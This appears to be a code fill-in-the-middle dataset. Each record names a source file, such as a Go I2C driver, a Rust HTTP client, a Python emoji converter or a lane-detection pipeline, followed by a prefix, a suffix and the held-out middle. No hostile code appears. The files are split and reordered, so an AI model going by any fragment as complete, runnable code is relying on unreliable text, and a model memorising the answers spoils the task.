return
}
buf := []byte{0, 0}
if _, err = c.Read(buf); err != nil {
return
}
low, high := buf[0], buf[1]
val = (uint16(high) << 8) | uint16(low)
return
}
func (c *firmataI2cConnection) WriteByte(val byte) (err error) {
buf := []byte{val}
_, err = c.Write(buf)
return
}
func (c *firmataI2cConnection) WriteByteData(reg uint8, val byte) (err error) {
buf := []byte{reg, val}
_, err = c.Write(buf)
return
}
func (c *firmataI2cConnection) WriteWordData(reg uint8, val uint16) (err error) {
low := uint8(val & 0xff)
high := uint8((val >> 8) & 0xff)
buf := []byte{reg, low, high}
_, err = c.Write(buf)
return
}
func (c *firmataI2cConnection) WriteBlockData(reg uint8, data []byte) (err error) {
if len(data) > 32 {
data = data[:32]
}
buf := make([]byte, len(data)+1)
copy(buf[:1], data)
buf[0] = reg
_, err = c.Write(buf)
return
}
|
{
return &firmataI2cConnection{adaptor: adaptor, address: address}
}
|
cmd.go
|
// Copyright Contributors to the Open Cluster Management project
package clusterpool
import (
"fmt"
clusteradmhelpers "open-cluster-management.io/clusteradm/pkg/helpers"
"github.com/open-cluster-management/cm-cli/pkg/clusterpoolhost"
genericclioptionscm "github.com/open-cluster-management/cm-cli/pkg/genericclioptions"
"github.com/open-cluster-management/cm-cli/pkg/helpers"
cmdutil "k8s.io/kubectl/pkg/cmd/util"
"github.com/spf13/cobra"
"k8s.io/cli-runtime/pkg/genericclioptions"
)
var example = `
# Scale clusterpool
%[1]s scale cp <clusterpool_name> --size <size> <options>
# Scale clusterpool on a given clusterpoolhost
%[1]s scale cp <clusterpool_name> --size <size> --cph <clusterpoolhost> <options>
`
// NewCmd ...
func
|
(cmFlags *genericclioptionscm.CMFlags, streams genericclioptions.IOStreams) *cobra.Command {
o := newOptions(cmFlags, streams)
cmd := &cobra.Command{
Use: "clusterpool",
Aliases: []string{"cp"},
Short: "Scale clusterpool",
Example: fmt.Sprintf(example, helpers.GetExampleHeader()),
SilenceUsage: true,
PreRunE: func(cmd *cobra.Command, args []string) error {
clusteradmhelpers.DryRunMessage(cmFlags.DryRun)
return clusterpoolhost.BackupCurrentContexts()
},
Run: func(cmd *cobra.Command, args []string) {
cmdutil.CheckErr(o.complete(cmd, args))
cmdutil.CheckErr(o.validate())
cmdutil.CheckErr(o.run())
},
PostRunE: func(cmd *cobra.Command, args []string) error {
return clusterpoolhost.RestoreCurrentContexts()
},
}
cmd.Flags().StringVar(&o.ClusterPoolHost, "cph", "", "The clusterpoolhost to use")
cmd.Flags().Int32Var(&o.Size, "size", 1, "Set the size of a clusterpool")
return cmd
}
|
NewCmd
|
settingsRoute.config.tsx
|
import { appConfig } from "../../config/app.config"
import { RouteConfig } from "../_utils/RouteConfig"
import { Settings } from "./Settings"
export const settingsRouteConfig: RouteConfig = {
|
path: `${appConfig.historyBasename}/settings`,
},
}
|
path: `${appConfig.historyBasename}/settings`,
element: () => <Settings />,
matchConfig: {
|
configuration.ts
|
import * as path from 'path';
import * as dotenv from 'dotenv';
const envFile = '.env';
dotenv.config({
path: path.resolve(process.cwd(), envFile),
});
interface Conf {
[key: string]: any;
|
}
export default (): Conf => {
return {
dora_url: process.env.DORA_URL,
relay_port: parseInt(process.env.RELAY_PORT, 10),
process_port: parseInt(process.env.PROCESS_PORT, 10),
manager_port: parseInt(process.env.MANAGER_PORT, 10),
jwt_secret: process.env.JWT_SECRET,
redis: {
host: process.env.REDIS_HOST,
port: process.env.REDIS_PORT,
password: process.env.REDIS_PASSWORD,
},
kafka: {
brokers: process.env.KAFKA_BROKERS.split(','),
},
elasticsearch: {
node: process.env.ELASTICSEARCH_NODE,
username: process.env.ELASTIC_USERNAME,
password: process.env.ELASTIC_PASSWORD,
},
email: {
host: process.env.EMAIL_SERVER_HOST,
port: parseInt(process.env.EMAIL_SERVER_PORT, 10),
user: process.env.EMAIL_SERVER_USER,
pass: process.env.EMAIL_SERVER_PASSWORD,
},
};
};
| |
setup.py
|
import os
from distutils.command.build import build
from django.core import management
from setuptools import find_packages, setup
from pretix_eventparts import __version__
try:
with open(
os.path.join(os.path.dirname(__file__), "README.rst"), encoding="utf-8"
) as f:
long_description = f.read()
except Exception:
long_description = ""
class CustomBuild(build):
def
|
(self):
management.call_command("compilemessages", verbosity=1)
build.run(self)
cmdclass = {"build": CustomBuild}
setup(
name="pretix-eventparts",
version=__version__,
description="Short description",
long_description=long_description,
url="https://github.com/bockstaller/pretix-eventparts",
author="Lukas Bockstaller",
author_email="[email protected]",
license="Apache",
install_requires=[],
packages=find_packages(exclude=["tests", "tests.*"]),
include_package_data=True,
cmdclass=cmdclass,
entry_points="""
[pretix.plugin]
pretix_eventparts=pretix_eventparts:PretixPluginMeta
""",
)
|
run
|
client.rs
|
use std::io::ErrorKind;
use bytes::BytesMut;
use url::Url;
use crate::body::Body;
use crate::error::{Error, InvalidUrl, IoError, Result};
use crate::header::HeaderMap;
use crate::method::Method;
use crate::proto::{Connector, HttpConfig, HttpConnector, HttpParser, ParserResult, RequestParser, ResponseParser};
use crate::request::Request;
use crate::response::Response;
use crate::version::Version;
/// the struct of http client
#[derive(Debug)]
pub struct HttpClient<C: Connector> {
connector: C,
}
impl<C: Connector> HttpClient<C> {
///
///
/// ```
/// use request_rs::produce::*;
/// use url::quirks::host;
/// use url::Url;
/// use hyper::client::HttpConnector;
///
/// let req = Request::builder()
/// .method(Method::GET)
/// .uri(Url::parse("https://www.example.com").expect("invalid url"))
/// .header("User-Agent", "request-rs")
/// .header("Host", host)
/// .version(Version::HTTP_11)
/// .body(Vec::new());
/// let mut client = Client::from_connector(HttpConnector::new());
/// let response =client.send(req).expect("request failed");
/// assert_eq!(response.status(),StatusCode::from_u16(200).unwrap());
/// ```
pub fn from_connector(connector: C) -> Self {
Self {
connector,
}
}
}
impl HttpClient<HttpConnector> {
/// do http request
/// ```
/// use request_rs::produce::*;
/// use url::quirks::host;
/// use url::Url;
///
/// fn main(){
/// let req = Request::builder()
/// .method(Method::GET)
/// .uri(Url::parse("https://www.example.com").expect("invalid url"))
/// .header("User-Agent", "request-rs")
/// .header("Host", host)
/// .version(Version::HTTP_11)
/// .body(Body::empty()).unwrap();
/// let mut client = HttpClient::http();
/// let response =client.send(req).expect("request failed");
/// assert_eq!(response.status(),StatusCode::from_u16(200).unwrap());
/// }
/// ```
pub fn send(&mut self, req: Request<Body>) -> Result<Response<Body>> {
let url = req.uri().ok_or(Error::from(InvalidUrl::new("missing url")))?.clone();
let sock_addr = RequestParser::socket_addr(&url)?;
let req_buf = RequestParser::encode(req)?;
self.connector.connect_to(&sock_addr)?;
// send request
self.connector.write_all(req_buf.as_ref())?;
// response
let mut data = Vec::new();
self.connector.read_all(&mut data)?;
let mut buf = BytesMut::from(data.as_slice());
let mut parser = ResponseParser::new();
let resp = match parser.parse(&mut buf)? {
ParserResult::Complete(resp) => resp,
ParserResult::Partial => {
return Err(Error::from(IoError::from_kind(ErrorKind::UnexpectedEof)));
}
};
Ok(resp)
}
/// send request
/// use http connector
/// ```
/// use request_rs::produce::*;
///
/// fn main(){
/// let mut client = HttpClient::http();
/// let resp = client.send_request("http://www.example.com",Method::GET,None,None).unwrap();
/// assert_eq!(resp,StatusCode::from_u16(200).unwrap())
/// }
/// ```
pub fn send_request(&mut self, url: &str, method: Method, headers: Option<HeaderMap>, body: Option<Body>) -> Result<Response<Body>> {
let url = Url::parse(url)?;
let host = url.domain().ok_or(Error::from(InvalidUrl::new("invalid url")))?;
let mut req = Request::builder()
.method(method)
.version(Version::HTTP_11);
if let Some(header) = headers {
req = req.replace_header_map(header);
} else {
req = req.header("User-Agent", "request-rs");
}
let body = match body {
Some(body) => body,
None => Body::empty()
};
let req = req.header("Host", host)
.uri(url)
.header("Content-Length", body.body_length())
.body(body)?;
self.send(req)
}
/// with http config
/// ```
/// use request_rs::config::h1::HttpConfig;
/// fn main(){
/// use std::time::Duration;
/// use request_rs::produce::{HttpClient, Method, StatusCode};
/// let config = HttpConfig {
/// connect_timeout: None,
/// happy_eyeballs_timeout: Some(Duration::from_millis(300)),
/// keep_alive_timeout: None,
/// local_address: None,
/// nodelay: false,
/// reuse_address: false,
/// send_buffer_size: None,
/// recv_buffer_size: None,
/// ttl: 64,
/// };
/// let mut client = HttpClient::with_config(config);
/// client.send_request("http://www.example.com",Method::GET,None,None).unwrap();
/// assert_eq!(response.status(),StatusCode::from_u16(200).unwrap());
/// }
/// ```
pub fn with_config(config: HttpConfig) -> Self {
Self::from_connector(HttpConnector::with_http_config(config))
}
/// use http connector
|
///
/// fn main(){
/// let mut client = HttpClient::http();
/// let resp = client.send_request("http://www.example.com",Method::GET,None,None).unwrap();
/// assert_eq!(resp,StatusCode::from_u16(200).unwrap())
/// }
/// ```
pub fn http() -> Self {
Self::from_connector(HttpConnector::new())
}
/// do http get request
///
/// ```
/// use request_rs::produce::*;
/// use url::Url;
/// use request_rs::headers::HeaderMap;
/// pub fn simple_get(){
/// let resp = HttpClient::request(Method::GET,"http://www.example.com/", None, None).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
///
/// pub fn simple_get_with_header(){
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::request(Method::GET,"http://www.example.com/", None, Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
/// ```
pub fn request(method: Method, url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
let mut client = Self::http();
client.send_request(url, method, headers, body)
}
/// do http get request
///
/// ```
/// use request_rs::produce::*;
/// use url::Url;
/// use request_rs::headers::HeaderMap;
/// pub fn simple_get(){
/// let resp = HttpClient::get("http://www.example.com/", None, None).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
///
/// pub fn simple_get_with_header(){
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::get("http://www.example.com/", None, Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
///
/// pub fn simple_get_with_param(){
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::get("http://www.example.com/?admin=yes&show=yes",None, Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
/// ```
pub fn get(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::GET, url, body, headers)
}
/// do http post request
/// ```
/// use request_rs::produce::*;
/// use url::Url;
/// use request_rs::headers::HeaderMap;
/// pub fn simple_post_with_data(){
/// let body = Body::from_str("username=admin&password123");
/// let mut header = HeaderMap::new();
/// header.append("Accept","text/html".parse().unwrap());
/// let resp = HttpClient::post("http://www.example.com/",Some(body), Some(header)).expect("failed");
/// assert_eq!(StatusCode::from_u16(200).unwrap(), resp.status());
/// }
/// ```
pub fn post(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::POST, url, body, headers)
}
/// do http put request
pub fn put(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::PUT, url, body, headers)
}
/// do http delete request
pub fn delete(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::DELETE, url, body, headers)
}
/// do http head request
pub fn head(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::HEAD, url, body, headers)
}
/// do http patch request
pub fn patch(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::PATCH, url, body, headers)
}
/// do http connect request
pub fn connect(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::CONNECT, url, body, headers)
}
/// do http options request
pub fn options(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::OPTIONS, url, body, headers)
}
/// do http trace request
pub fn trace(url: &str, body: Option<Body>, headers: Option<HeaderMap>) -> Result<Response<Body>> {
Self::request(Method::TRACE, url, body, headers)
}
}
|
/// ```
/// use request_rs::produce::*;
|
emoji.py
|
import json
import re
import unicodedata
import string
import hashlib
def smileys_to_ascii(s):
res = []
for i, c in enumerate(s):
if c in SMILEYS:
res.append(SMILEYS[c])
if i < len(s) - 1 and s[i + 1] in SMILEYS: # separate smileys
res.append(' ')
elif ord(c) > 128 and unicodedata.category(c)[0] == 'S':
try:
name = ':'+unicodedata.name(c).lower().replace(' ','-')+':'
res.append(name)
except:
res.append(c)
else:
res.append(c)
return ''.join(res)
def ascii_to_smileys(s):
res = []
words = s.split(' ')
for word in words:
if word in ASCIIS:
res.append(ASCIIS[word])
elif word[0]==':' and word[-1]==':':
try:
emoji = unicodedata.lookup(word[1:-1].upper().replace('-',' '))
res.append(emoji)
except:
res.append(word)
else:
res.append(word)
return ''.join(res)
def emoji_to_shortcode(message):
res = []
for i, c in enumerate(message):
if ord(c) > 128 and unicodedata.category(c)[0] == 'S':
name = ':'+unicodedata.name(c).lower().replace(' ','-')+':'
res.append(name)
else:
res.append(c)
return ''.join(res)
def
|
(message):
parts = message.split(":")
out = ""
c = False
for part in parts:
if part in name_to_emoji:
out += name_to_emoji[part]
c = False
else:
if c:
out += ':'
else:
c = True
out += part
return out
with open('emoji/gemoji.js', 'rb') as fp:
data = fp.read()
data = data.decode('utf-8')
gemoji = json.loads(data)
name_to_emoji = {}
for emoji, data in gemoji.items():
for name in data['names']:
name_to_emoji[name] = emoji
SMILEYS = {chr(k): v for k, v in {
0x263a: ':)',
0x1f494: '</3',
0x1f49c: '<3',
0x2764: '<3',
0x1f60a: '=D',
0x1f600: ':D',
0x1f601: '^_^',
0x1f602: ':\'D',
0x1f603: ':D',
0x1f604: ':D',
0x1f605: ':D',
0x1f606: ':D',
0x1f607: '0:)',
0x1f608: '}:)',
0x1f609: ';)',
0x1f60e: '8)',
0x1f610: ':|',
0x1f611: '-_-',
0x1f613: 'o_o',
0x1f614: 'u_u',
0x1f615: ':/',
0x1f616: ':s',
0x1f617: ':*',
0x1f618: ';*',
0x1f61B: ':P',
0x1f61C: ';P',
0x1f61E: ':(',
0x1f621: '>:(',
0x1f622: ';_;',
0x1f623: '>_<',
0x1f626: 'D:',
0x1f62E: ':o',
0x1f632: ':O',
0x1f635: 'x_x',
0x1f638: ':3',
0x1f620: '>:(',
0x1f62c: '>:(',
0x1f62a: '(-_-)zzz',
0x1f634: '(-_-).zZ',
0x1f4a4: '.zZ',
0x1f624: '>:(',
0x1f625: 'D:',
0x1f627: 'D:',
0x1f619: ':*',
0x1f61a: ':*',
0x1f612: ':|',
0x1f636: ':|',
0x1f613: ':O',
0x1f630: ':O',
0x1f628: 'o_o',
0x1f631: 'O_O',
0x1f62d: ':''(',
0x1f61d: ';P',
0x1f64d: '>:|',
0x1f626: '>:O',
0x1f61f: ':/',
0x2639: ':(',
0x1f60b: ';P',
0x1f60d: '<3<3<3',
0x1f642: ':)',
0x1f917: ':hug:',
0x1f914: ':/ hmm',
0x1f644: '(e_e)',
0x1f62f: ':-o',
0x1f62b: "'>_<",
0x1f913: 'B-)',
0x1f641: ':(',
0x1f629: '>_<',
}.items()}
ASCIIS = {v: chr(k) for k, v in {
0x1f62a: '(-_-)zzz',
0x1f634: '(-_-).zZ',
0x1f4a4: '.zZ',
0x1f631: 'O_O',
0x1f62d: ":''(",
0x1f64d: '>:|',
0x1f626: '>:O',
0x2764: ':heart:',
0x263a: ':)',
0x1f494: '</3',
0x1f49c: '<3',
0x1f60a: '=D',
0x1f600: ':D',
0x1f601: '^_^',
0x1f602: ':\'D',
0x1f607: '0:)',
0x1f608: '}:)',
0x1f609: ';)',
0x1f60e: '8)',
0x1f610: ':|',
0x1f611: '-_-',
0x1f613: 'o_o',
0x1f614: 'u_u',
0x1f615: ':/',
0x1f616: ':s',
0x1f617: ':*',
0x1f618: ';*',
0x1f61B: ':P',
0x1f61C: ';P',
0x1f61e: ':(',
0x1f621: '>:(',
0x1f622: ';_;',
0x1f622: ';(',
0x1f622: ":'(",
0x1f623: '>_<',
0x1f626: 'D:',
0x1f62E: ':o',
0x1f632: ':O',
0x1f635: 'x_x',
0x1f638: ':3',
0x1f917: ':hug:',
0x1f644: '(e_e)',
}.items()}
|
shortcode_to_emoji
|
index.js
|
const { setupThenCommand: ingestV2Command } = require('./ingestV2');
const { setupThenCommand: deleteActivityCommand } = require('./deleteActivity');
const { setupThenCommand: migrateStatsCommand } = require('./migrateStats');
const { setupThenCommand: recalculateStatsCommand } = require('./recalculateStats');
const { withPrompt } = require('../utils');
module.exports = {
command: [
'athlete <subcommand> [<subargs...>]',
],
describe: 'Stats commands',
handler: async (args) => {
const usePrompt = (cmd, msg) => {
withPrompt(
() => { cmd(args); },
// eslint-disable-next-line quotes
`${msg}${!args.dryRun ? '' : `${"\n"}**DRY RUN**`}`,
);
};
switch (args.subcommand) {
case 'recalculatestats':
recalculateStatsCommand(args);
// usePrompt(
// recalculateStatsCommand,
// 'This will override all athlete stats.',
// );
break;
|
case 'ingesthistory':
usePrompt(
ingestV2Command,
'Will overwrite athlete stats and activities. Data for multi-location activities MAY BE DESTROYED.',
);
break;
case 'deleteactivity':
usePrompt(
deleteActivityCommand,
'This will delete an activity and decrement athlete stats.',
);
break;
case 'migratestats':
usePrompt(
migrateStatsCommand,
'This will transform athlete stats from v1 to v2 format.',
);
break;
default:
console.log('Invalid subcommand');
}
},
};
| |
_app.js
|
if (typeof window !== 'undefined') {
window.caughtWarns = []
const origWarn = window.console.warn
const origError = window.console.error
window.console.warn = function (...args) {
|
origWarn(...args)
}
window.console.error = function (...args) {
window.caughtWarns.push(args.join(' '))
origError(...args)
}
}
export default function MyApp({ Component, pageProps }) {
return <Component {...pageProps} />
}
|
window.caughtWarns.push(args.join(' '))
|
pooling.js
|
#!/usr/bin/env node
const Sema = require('async-sema')
const redis = require('promise-redis')
async function
|
() {
const red = new Sema(3, { initFn: () => redis().createClient(process.env.REDIS_URL) })
const db = await red.acquire()
console.log(await db.get('id'))
red.release(db)
const dbs = await red.drain()
dbs.map((db) => db.quit())
}
f().catch((e) => console.log(e)).then(() => console.log('READY'))
|
f
|
thread.rs
|
// Copyright 2016 Phillip Oppermann, Calvin Lee and JJ Garzella.
// See the README.md file at the top-level directory of this
// distribution.
//
// Licensed under the MIT license <LICENSE or
// http://opensource.org/licenses/MIT>, at your option.
// This file may not be copied, modified, or distributed
// except according to those terms.
use interrupts::{Context, EXIT_INT};
use memory::{alloc_stack, Stack};
use core::sync::atomic::{AtomicUsize, Ordering, ATOMIC_USIZE_INIT};
use core::mem;
/// The `id` of the next thread to be created
static ID: AtomicUsize = ATOMIC_USIZE_INIT;
/// The basic number of "ticks" each program gets to run
pub const TICKS: u8 = 10;
extern "C" {
static kstack_late_bottom: usize;
static kstack_top: usize;
}
pub enum State {
Running,
Ready,
Sleeping,
}
pub struct KThread {
pub id: usize,
stack: Stack,
// Ready => Some(_), _ => None
// XXX should this be a &'static _ or *const _ ? The former is wrong but
// works and the latter is cumbersome but more explicit.
// This is the top of the kernel stack when the thread is queued, and
// `None`when it is running.
context: Option<&'static Context>,
pub quanta: u8,
pub state: State,
}
impl KThread {
/// Create a new thread with the given start point
///
/// # Side effects
/// Allocates a global stack for the given thread
pub fn new(start: extern "C" fn()) -> Result<KThread, &'static str> {
// for now create a 1-page stack
let stack = alloc_stack(1)?;
// now we must put the things we need on the stack.
// In the meanwhile, grab an unbounded lifetime to our context
let context = unsafe {
// if the function ever returns, make it go to the thread exit point
let mut stack_pointer = stack.top();
stack_pointer -= mem::size_of::<extern "C" fn() -> !>();
*(stack_pointer as *mut extern "C" fn() -> !) = exit;
|
let context = (context_pointer as *mut Context).as_mut().unwrap();
context.regs.zero();
context.stack_frame.instruction_pointer = start as usize;
// TODO remove magic numbers, kernel code segment
context.stack_frame.code_segment = 0b1000;
// TODO remove magic numbers, Interrupts enabled | reserved
context.stack_frame.cpu_flags = 0x202;
context.stack_frame.stack_pointer = stack_pointer;
context.stack_frame.stack_segment = 0;
}
(context_pointer as *const Context).as_ref().unwrap()
};
Ok(KThread {
id: ID.fetch_add(1, Ordering::Relaxed),
stack: stack,
context: Some(context),
quanta: TICKS,
state: State::Ready,
})
}
/// Return the current "main" thread.
///
/// # Safety
/// This function may only be called once on the main thread
pub unsafe fn main() -> KThread {
assert_has_not_been_called!("The main kthread can be created only once!");
let top = &kstack_late_bottom as *const _ as usize;
let bottom = &kstack_top as *const _ as usize;
KThread {
id: ID.fetch_add(1, Ordering::Relaxed),
stack: Stack::new(bottom, top),
context: None, /* current thread */
quanta: TICKS,
state: State::Running,
}
}
/// Return the "idle" thread
///
/// # Safety
/// Only call once
///
/// # Side effects
/// Allocates a global stack
pub unsafe fn idle() -> KThread {
assert_has_not_been_called!("The idle kthread can be created only once!");
Self::new(idle).unwrap()
}
/// Put `context` into the given thread and return the context
/// from the other thread. This should be used to swap threads.
pub fn swap(&mut self, context: &'static Context, other: &mut KThread)
-> &'static Context
{
assert!(self.context.is_none());
self.context = Some(context);
self.state = State::Ready;
// give `other` the default time slice
other.state = State::Running;
other.quanta = TICKS;
other.context.take().unwrap()
}
}
extern "C" fn idle() {
loop {
unsafe { asm!("hlt") };
}
}
pub extern "C" fn exit() -> ! {
unsafe { asm!("int $0" :: "i"(EXIT_INT) :: "volatile") };
unreachable!();
}
|
// Now we put on a fake interrupt context for returning to the thread
let context_pointer = stack_pointer - mem::size_of::<Context>();
{
|
video_pipeline.py
|
import numpy as np
import pickle
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from moviepy.editor import VideoFileClip
from image_thresholding import *
from plotting_helpers import *
from line_fit import *
from Line import *
# *** PIPELINE ***
def pipeline(img):
global error_im, skipped_frames
# 1. Correct distorsion
# open distorsion matrix
try:
saved_dist = pickle.load(open('calibrate_camera.p', 'rb'), encoding='latin1')
mtx = saved_dist['mtx']
dist = saved_dist['dist']
except (OSError, IOError): # No progress file yet available
print("No saved distorsion data. Run camera_calibration.py")
# apply correction
undist = cv2.undistort(img, mtx, dist, None, mtx)
# 2. Apply filters to get binary map
ksize = 3
gradx = abs_sobel_thresh(undist, orient='x', sobel_kernel=ksize, thresh=(10, 100))
grady = abs_sobel_thresh(undist, orient='y', sobel_kernel=ksize, thresh=(5, 100))
mag_bin = mag_thresh(undist, sobel_kernel=ksize, mag_thresh=(10, 200))
dir_bin = dir_threshold(undist, sobel_kernel=15, thresh=(0.9, 1.2))
hls_bin = hls_select(img, thresh=(50, 255))
white_bin = white_select(img, thresh=195)
yellow_bin = yellow_select(img)
# combine filters to a final output
combined = np.zeros_like(dir_bin)
combined[((mag_bin == 1) & (dir_bin == 1) & (hls_bin == 1)) |
((white_bin == 1) | (yellow_bin == 1))] = 1
# 3. Define trapezoid points on the road and transform perspective
X = combined.shape[1]
Y = combined.shape[0]
src = np.float32(
[[205, 720],
[1075, 720],
[700, 460],
[580, 460]])
dst = np.float32(
[[300, 720],
[980, 720],
[980, 0],
[300, 0]])
# get perspective transformation matrix
|
warped = cv2.warpPerspective(combined, M, (X,Y), flags=cv2.INTER_LINEAR)
# 4. Get polinomial fit of lines
# if > 4 frames skipped (or first frame, as skipped_frames is initialized to 100) do full search
if skipped_frames > 5:
fit_method = "Boxes"
leftx, lefty, rightx, righty, out_img = find_lane_pixels(warped)
else:
fit_method = "Around fit"
leftx, lefty, rightx, righty, out_img = find_lane_around_fit(warped, left_lane.fit_x, right_lane.fit_x)
# fit polynomials and sanity check
try:
left_fit, right_fit, left_px, right_px, ploty = fit(leftx, lefty, rightx, righty, warped.shape[0])
detected, err_msg = sanity_chk(ploty, left_px, right_px)
except:
detected, err_msg = False, "Empty data"
if detected: skipped_frames = 0
else: skipped_frames += 1
# 5. Calculate distance to center, curvature, and update Line objects
if detected or (fit_method == "Boxes" and err_msg != "Empty data"):
left_curv, right_curv = find_curv(ploty, left_fit, right_fit)
left_lane.update(ploty, left_fit, left_px, left_curv)
right_lane.update(ploty, right_fit, right_px, right_curv)
lane_w = (right_lane.base_pos - left_lane.base_pos) * 3.7/700
offset = (((right_lane.base_pos + left_lane.base_pos) - img.shape[1]) / 2) * 3.7/700
# 6. Plot fitted lanes into original image
# Create an image to draw the lines on
warp_zero = np.zeros_like(warped).astype(np.uint8)
color_warp = np.dstack((warp_zero, warp_zero, warp_zero))
# Recast the x and y points into usable format for cv2.fillPoly()
pts_left = np.array([np.transpose(np.vstack([left_lane.fit_x, left_lane.fit_y]))])
pts_right = np.array([np.flipud(np.transpose(np.vstack([right_lane.fit_x, right_lane.fit_y])))])
pts = np.hstack((pts_left, pts_right))
# Draw the lane onto the warped blank image
cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))
# Warp the blank back to original image space using inverse perspective matrix (Minv)
newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0]))
# Combine the result with the original image
result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)
# if error save original img to check closely in image pipeline
if 1 < skipped_frames < 3:
mpimg.imsave(err_msg + "_" + str(error_im) + ".jpg", img)
error_im += 1
# Add text
road_curv = (left_lane.curv_avg + right_lane.curv_avg) // 2
if road_curv > 2000:
road_curv_text = "Road curvature: straight"
else:
road_curv_text = "Road curvature: " + str(road_curv) + "m"
side = {True: "left", False: "right"}
offset_txt = "Car is {0:.2f}m {1:s} of center".format(offset, side[offset > 0])
for i, txt in enumerate([road_curv_text, offset_txt]):
cv2.putText(result, txt, (75, 75 * (i+1)), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255), 3)
# Uncomment for debugging messages
# lane_width_txt = "Lane width: %.2f m" % lane_w
# for i, obj, txt in [(1, left_lane, "Left"), (2, right_lane, "Right")]:
# if obj.curv_avg > 2000:
# curv_txt = txt + " curvature: straight"
# else:
# curv_txt = txt + " curvature: " + str(int(obj.curv_avg)) + "m"
# cv2.putText(result,curv_txt, (550, 50 * i), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
# cv2.putText(result, "Skipped frames: " + str(skipped_frames), (550,150), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
# cv2.putText(result, fit_method, (550, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
# if err_msg != "":
# cv2.putText(result, "Error!: " + err_msg, (550, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, 0, 2)
return result
# *** MAIN ***
# define global variables to use in the pipeline
left_lane = Line()
right_lane = Line()
error_im = 1
skipped_frames = 100
# load video
clip_name = "challenge_video"
clip1 = VideoFileClip(clip_name + ".mp4")#.subclip(0, 8)
# run video through the pipeline and save output
out_clip = clip1.fl_image(pipeline)
out_clip.write_videofile("output_videos/" + clip_name + "_output.mp4", audio=False)
|
M = cv2.getPerspectiveTransform(src, dst)
Minv = cv2.getPerspectiveTransform(dst, src)
# warp the result of binary thresholds
|
ez_setup.py
|
#!/usr/bin/env python
"""
Setuptools bootstrapping installer.
Run this script to install or upgrade setuptools.
"""
import os
import shutil
import sys
import tempfile
import zipfile
import optparse
import subprocess
import platform
import textwrap
import contextlib
import warnings
from distutils import log
try:
from urllib.request import urlopen
except ImportError:
from urllib2 import urlopen
try:
from site import USER_SITE
except ImportError:
USER_SITE = None
DEFAULT_VERSION = "18.5"
DEFAULT_URL = "https://pypi.python.org/packages/source/s/setuptools/"
DEFAULT_SAVE_DIR = os.curdir
def _python_cmd(*args):
"""
Execute a command.
Return True if the command succeeded.
"""
args = (sys.executable,) + args
return subprocess.call(args) == 0
def _install(archive_filename, install_args=()):
"""Install Setuptools."""
with archive_context(archive_filename):
# installing
log.warn('Installing Setuptools')
if not _python_cmd('setup.py', 'install', *install_args):
log.warn('Something went wrong during the installation.')
log.warn('See the error message above.')
# exitcode will be 2
return 2
def _build_egg(egg, archive_filename, to_dir):
"""Build Setuptools egg."""
with archive_context(archive_filename):
# building an egg
log.warn('Building a Setuptools egg in %s', to_dir)
_python_cmd('setup.py', '-q', 'bdist_egg', '--dist-dir', to_dir)
# returning the result
log.warn(egg)
if not os.path.exists(egg):
raise IOError('Could not build the egg.')
class ContextualZipFile(zipfile.ZipFile):
"""Supplement ZipFile class to support context manager for Python 2.6."""
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def __new__(cls, *args, **kwargs):
"""Construct a ZipFile or ContextualZipFile as appropriate."""
if hasattr(zipfile.ZipFile, '__exit__'):
return zipfile.ZipFile(*args, **kwargs)
return super(ContextualZipFile, cls).__new__(cls)
@contextlib.contextmanager
def archive_context(filename):
"""
Unzip filename to a temporary directory, set to the cwd.
The unzipped target is cleaned up after.
"""
tmpdir = tempfile.mkdtemp()
log.warn('Extracting in %s', tmpdir)
old_wd = os.getcwd()
try:
os.chdir(tmpdir)
with ContextualZipFile(filename) as archive:
archive.extractall()
# going in the directory
subdir = os.path.join(tmpdir, os.listdir(tmpdir)[0])
os.chdir(subdir)
log.warn('Now working in %s', subdir)
yield
finally:
os.chdir(old_wd)
shutil.rmtree(tmpdir)
|
def _do_download(version, download_base, to_dir, download_delay):
"""Download Setuptools."""
egg = os.path.join(to_dir, 'setuptools-%s-py%d.%d.egg'
% (version, sys.version_info[0], sys.version_info[1]))
if not os.path.exists(egg):
archive = download_setuptools(version, download_base,
to_dir, download_delay)
_build_egg(egg, archive, to_dir)
sys.path.insert(0, egg)
# Remove previously-imported pkg_resources if present (see
# https://bitbucket.org/pypa/setuptools/pull-request/7/ for details).
if 'pkg_resources' in sys.modules:
del sys.modules['pkg_resources']
import setuptools
setuptools.bootstrap_install_from = egg
def use_setuptools(
